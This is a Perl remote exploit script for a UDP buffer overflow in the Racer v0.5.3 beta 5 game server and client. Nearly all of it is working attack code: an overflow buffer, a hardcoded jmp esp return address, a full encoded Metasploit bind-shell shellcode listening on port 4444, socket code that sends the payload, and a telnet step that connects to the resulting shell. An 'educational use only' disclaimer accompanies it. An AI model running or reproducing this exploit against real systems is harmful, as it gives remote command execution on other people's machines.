racer-overflow.txt

`#!/usr/bin/perl  
###Credit's to n00b.  
################################################  
#Racer v0.5.3 beta 5 (12-03-07) remote exploit.  
#Racer is also prone to a buffer over flow in the  
#server and client.Automatically the game open's  
#Udp port 26000 and is waiting for a msg buffer.  
#If we send an overly long buffer we are able to  
#Control the eip register and esp hold's enough  
#buffer to have a good size shell code.  
###############################################  
#Tested: Win Xp sp2 English  
#Vendor's web site: http://www.racer.nl/  
#Affected version's: all version's.  
#Tested on: Racer v0.5.3 beta 5 (12-03-07).  
#Special thank's to str0ke.  
###########################  
  
  
print <<End;  
*****************************************************  
Racer v0.5.3 beta 5 (12-03-07) remote exploit  
=====================================================  
Credit's to n00b for finding this bug and writing  
the exploit.This exploit work's for the client  
and the server.  
*****************************************************  
  
Disclaimer  
----------  
The information in this advisory and any of its  
demonstrations is provided "as is" without any  
warranty of any kind.  
I am not liable for any direct or indirect damages  
caused as a result of using the information or  
demonstrations provided in any part of this advisory.  
Educational use only..!!  
*****************************************************  
Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo  
Luigi Auriemma.  
*****************************************************  
(*)Please wait  
End  
  
sleep 8;  
system("cls");  
  
use IO::Socket;  
  
$ip = $ARGV[0];  
  
$payload1 = "A"x1001;  
  
#jmp esp 0x77D8AF0A user32.dll english  
$jmpcode = "\x0A\xAF\xD8\x77";  
  
#win32_bind -EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2  
#http://metasploit.com */.  
$shellcode =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".  
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67".  
"\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x77\x32\x42\x42\x42\x32".  
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x5a\x49\x49\x6c\x72".  
"\x4a\x48\x6b\x32\x6d\x48\x68\x4c\x39\x39\x6f\x39\x6f\x69\x6f\x43".  
"\x50\x6e\x6b\x50\x6c\x66\x44\x41\x34\x4c\x4b\x73\x75\x47\x4c\x6c".  
"\x4b\x43\x4c\x57\x75\x30\x78\x75\x51\x7a\x4f\x4c\x4b\x42\x6f\x34".  
"\x58\x4e\x6b\x41\x4f\x37\x50\x46\x61\x7a\x4b\x42\x69\x4e\x6b\x46".  
"\x54\x6c\x4b\x63\x31\x6a\x4e\x50\x31\x49\x50\x4c\x59\x6e\x4c\x6f".  
"\x74\x49\x50\x32\x54\x74\x47\x6f\x31\x6b\x7a\x44\x4d\x46\x61\x6f".  
"\x32\x4a\x4b\x4a\x54\x77\x4b\x31\x44\x51\x34\x55\x78\x31\x65\x4b".  
"\x55\x6c\x4b\x33\x6f\x75\x74\x63\x31\x38\x6b\x35\x36\x4e\x6b\x44".  
"\x4c\x70\x4b\x4e\x6b\x43\x6f\x55\x4c\x36\x61\x78\x6b\x36\x63\x66".  
"\x4c\x4e\x6b\x6f\x79\x42\x4c\x31\x34\x57\x6c\x75\x31\x78\x43\x75".  
"\x61\x39\x4b\x50\x64\x4c\x4b\x57\x33\x34\x70\x4c\x4b\x77\x30\x64".  
"\x4c\x4c\x4b\x70\x70\x37\x6c\x4c\x6d\x6e\x6b\x61\x50\x74\x48\x31".  
"\x4e\x30\x68\x6c\x4e\x62\x6e\x44\x4e\x78\x6c\x72\x70\x39\x6f\x79".  
"\x46\x63\x56\x76\x33\x70\x66\x42\x48\x56\x53\x37\x42\x53\x58\x62".  
"\x57\x41\x63\x54\x72\x63\x6f\x51\x44\x59\x6f\x5a\x70\x50\x68\x7a".  
"\x6b\x6a\x4d\x4b\x4c\x47\x4b\x62\x70\x59\x6f\x6e\x36\x71\x4f\x6f".  
"\x79\x4d\x35\x43\x56\x6b\x31\x4a\x4d\x33\x38\x34\x42\x31\x45\x52".  
"\x4a\x55\x52\x79\x6f\x6e\x30\x73\x58\x6a\x79\x77\x79\x4c\x35\x4c".  
"\x6d\x52\x77\x39\x6f\x69\x46\x72\x73\x71\x43\x61\x43\x41\x43\x30".  
"\x53\x42\x63\x46\x33\x42\x63\x71\x43\x4b\x4f\x58\x50\x71\x76\x30".  
"\x68\x32\x31\x71\x4c\x65\x36\x41\x43\x6b\x39\x58\x61\x6a\x35\x63".  
"\x58\x59\x34\x76\x7a\x30\x70\x4b\x77\x61\x47\x49\x6f\x4a\x76\x71".  
"\x7a\x42\x30\x53\x61\x41\x45\x6b\x4f\x5a\x70\x53\x58\x6e\x44\x6c".  
"\x6d\x64\x6e\x6d\x39\x36\x37\x49\x6f\x4b\x66\x73\x63\x30\x55\x39".  
"\x6f\x4e\x30\x52\x48\x4d\x35\x41\x59\x6f\x76\x32\x69\x70\x57\x49".  
"\x6f\x4e\x36\x66\x30\x66\x34\x30\x54\x43\x65\x4b\x4f\x4a\x70\x4f".  
"\x63\x63\x58\x39\x77\x50\x79\x68\x46\x64\x39\x36\x37\x39\x6f\x4e".  
"\x36\x70\x55\x4b\x4f\x6e\x30\x63\x56\x31\x7a\x32\x44\x42\x46\x31".  
"\x78\x33\x53\x72\x4d\x4d\x59\x78\x65\x50\x6a\x52\x70\x70\x59\x57".  
"\x59\x38\x4c\x6b\x39\x5a\x47\x31\x7a\x72\x64\x4e\x69\x4b\x52\x70".  
"\x31\x49\x50\x78\x73\x4e\x4a\x4b\x4e\x71\x52\x56\x4d\x6b\x4e\x72".  
"\x62\x34\x6c\x4f\x63\x6e\x6d\x33\x4a\x77\x48\x4e\x4b\x6c\x6b\x4c".  
"\x6b\x55\x38\x32\x52\x6b\x4e\x58\x33\x56\x76\x59\x6f\x70\x75\x43".  
"\x74\x49\x6f\x7a\x76\x43\x6b\x36\x37\x70\x52\x36\x31\x31\x41\x31".  
"\x41\x52\x4a\x54\x41\x70\x51\x51\x41\x50\x55\x63\x61\x6b\x4f\x58".  
"\x50\x73\x58\x4c\x6d\x79\x49\x43\x35\x4a\x6e\x31\x43\x4b\x4f\x7a".  
"\x76\x71\x7a\x59\x6f\x4b\x4f\x64\x77\x6b\x4f\x38\x50\x4c\x4b\x50".  
"\x57\x79\x6c\x4c\x43\x5a\x64\x70\x64\x4b\x4f\x4e\x36\x33\x62\x79".  
"\x6f\x6e\x30\x41\x78\x4c\x30\x6f\x7a\x43\x34\x51\x4f\x50\x53\x79".  
"\x6f\x4a\x76\x4b\x4f\x4e\x30\x67";  
  
$payload2 = "B"x500;  
  
  
if(!$ip)  
{  
  
die "remember the ip\n";  
  
}  
  
$port = '26000';  
  
$protocol = 'udp';  
  
$socket = IO::Socket::INET->new(PeerAddr=>$ip,  
PeerPort=>$port,  
Proto=>$protocol,  
Timeout=>'1') || die "Make sure service  
is running on the port\n";  
  
{  
print $socket $payload1,$jmpcode,$shellcode,$payload2,;  
print "[+]Sending malicious payload.\n";  
sleep 2;  
system("cls");  
print "[+]Done !!.\n";  
close($socket);  
{  
sleep 5;  
print " + Connecting on port 4444 of $host ...\n";  
system("telnet $ip 4444");  
close($socket);  
}  
}  
  
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
#Microsoft Windows XP [Version 5.1.2600]  
#(C) Copyright 1985-2001 Microsoft Corp.  
# C:\Documents and Settings\****\Desktop\racer053b5>  
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
`